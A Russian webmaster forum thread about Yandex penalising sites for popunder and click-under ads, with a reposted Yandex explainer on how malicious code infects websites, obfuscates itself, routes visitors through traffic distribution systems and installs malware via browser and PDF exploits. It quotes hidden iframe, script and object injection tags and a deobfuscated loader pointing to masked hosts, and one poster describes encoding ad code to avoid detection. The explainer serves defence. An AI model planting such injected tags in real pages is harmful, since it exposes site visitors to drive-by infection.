AndroidXXX

SEOForce:
каким образом? 😮

kub1k:
А баннерная система для взрослых может использовать такой код:

<script language="javascript">
var xxxwidth= 300;
var xxxheight= 100;
var xxxbgcolor= '';
var xxxcolor= 'blue';
var xxxsize= 16;
var xxxcount= 5;
</script>
<script language="javascript" src="http: //*****-*****.ru/load.php?id=330"></script>

Так это же баннерная реклама он совсем чтоли а....ел !!!

kolbas:
Попандер на сайте не стоял никогда, но 3 марта с 9К хостов с Яши осталось 90, через некоторое время написал Яше и как раз убрал клик-андер, траф вырос... до 250 чел. в день... Сайт был без клик-андера месяц, прошло несколько Апов, а резальтатов 0, в индексе большинство страниц, но морды нет, по запросам вобще ноль. Плюнул и поставил назад клик-андер, но уже закодированный и написал Платону с вопросом о том почему морда никак не вернётся, только что прислал ответ слово в слово как выше приводит inseonight. Т.ч. х.з., что снимай, что ни снимай один х*й... Надо с Гуглом дружить плотнее, но это проще сказать чем сделать... Мало того, что из-за кризиса доходы резко упали, так ещё это "чудо" жизни не даёт...

Как выглядит вредоносный код

Примеры. Вредоносный код может добавлять к страницам такие конструкции:

<iframe src="http: //****-*******.net/?click=12078406" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>


или

<script src=http: //www.****.ru/script.js></script>


или такой

<object data='http: //***.name/in.cgi?2 ' type='text/html' style='display:none'></object>


А баннерная система для взрослых может использовать такой код:

<script language="javascript">
var xxxwidth= 300;
var xxxheight= 100;
var xxxbgcolor= '';
var xxxcolor= 'blue';
var xxxsize= 16;
var xxxcount= 5;
</script>
<script language="javascript" src="http: //*****-*****.ru/load.php?id=330"></script>


Маскировка вредоносного кода

Часто авторы кода стараются затруднить его анализ и обнаружение, используя специальные техники, называемые обфускацией (от англ. obfuscation). Это может выглядеть так:




Заражение компьютера пользователя

Почему происходит заражение? Казалось бы, страница просто загружается браузером и отображается. Если бы в программах не было ошибок, то загрузка и отображение были бы всегда безопасными действиями. К сожалению, такие ошибки (уязвимости) есть, они и используются злоумышленниками. Хотя компании регулярно выпускают обновления для своих продуктов, злоумышленники постоянно исследуют их в поиске новых уязвимостей.

Вредоносный код на загружаемой пользователем странице, выполняясь, использует уязвимости приложений, что позволяет злоумышленникам получить полный контроль над атакуемым компьютером. Специально написанная для этого программа или скрипт называется эксплойт (от англ. exploit). Эксплойты для разных типов уязвимостей объединяют в наборы (exploit packs) для повышения вероятности заражения компьютера жертвы. Для атаки используются уязвимости как в самом браузере, так и в других приложениях и дополнениях (например, в плагинах для просмотра PDF и flash).


Как на этом зарабатывают

Очень часто код, внедренный в страницу сайта, перенаправляет пользователя на эксплойт или рекламный сайт не напрямую, а через специальный сервер злоумышленников, который называют Traffic Distribution System (TDS). Задача этой системы -- "перебрасывать" пользователей дальше и собирать статистику в зависимости от характеристик атакуемого компьютера. Например, TDS может анализировать версию используемого браузера и направлять пользователя на систему с вредоносным кодом, где есть эксплойт для его версии.

Если код эксплойта получил контроль над компьютером пользователя, то он выполняет загрузку и исполнение основной части вируса. Эта часть остается активной на компьютере жертвы и может выполнять множество вредоносных действий. Например, собирать имена и пароли для FTP и других установленных программ и отправлять их злоумышленникам. Или же использовать их для дальнейшего заражения сайтов. Или показывать пользователю рекламу, подменять результаты поисковых систем. Следить за действиями пользователя и "коллекционировать" учетные записи для популярных сайтов или online-банков. Часто различные зловредные модули могут объединяться, а компьютер включаться в сеть из инфицированных систем (бот-сеть), контролируемых злоумышленниками. Крупнейшие ботнеты в мире насчитывают миллионы "зомбированных" компьютеров. Продажа услуг такой сети -- еще одна статья дохода злоумышленников. Бот-сеть может использоваться для рассылки спама или организации DDoS-атак.

Пример

Рассмотрим код, который можно встретить в зараженной баннерной системе или на popunder-баннере. Казалось бы, "безобидный" код

<script language="javascript" src="http: //*****-*****.ru/load.php?id=330"></script>


кроме показа баннера вставляет на страницу и такой код

<iframe src="http: //************.com/tds/in.cgi?13" frameborder=0 width=0 height=0></iframe>


Если открыть эту страницу в Firefox 3.0.10, то после выполнения кода баннерной системы браузер пользователя автоматически перейдет по ссылке, указанной в IFRAME, а ссылка приведет на TDS злоумышленников. В ответ от TDS браузер получает автоматическое перенаправление на следующий сайт, где расположен эксплойт, учитывающий версию браузера. Он рассчитан на уязвимость в Adobe Acrobat Reader и приводится в действие обфусцированным кодом, который в расшифрованном виде выглядит так:

function pdf() { var my_div = document.createElement("div"); my_div.innerHTML = "<object data=\"http: //****.org/spl/pdf.php\" type=\"application/pdf\" width=100 height=100></object>"; document.body.appendChild(my_div); } pdf();


Послесловие

Задачи по борьбе с вирусами появились в Яндексе около года назад. Мы надеемся, что наш поиск, став более безопасным, снизит темпы распространения вредоносных программ в Рунете.


Группа пролетарского гнева компании Яндекс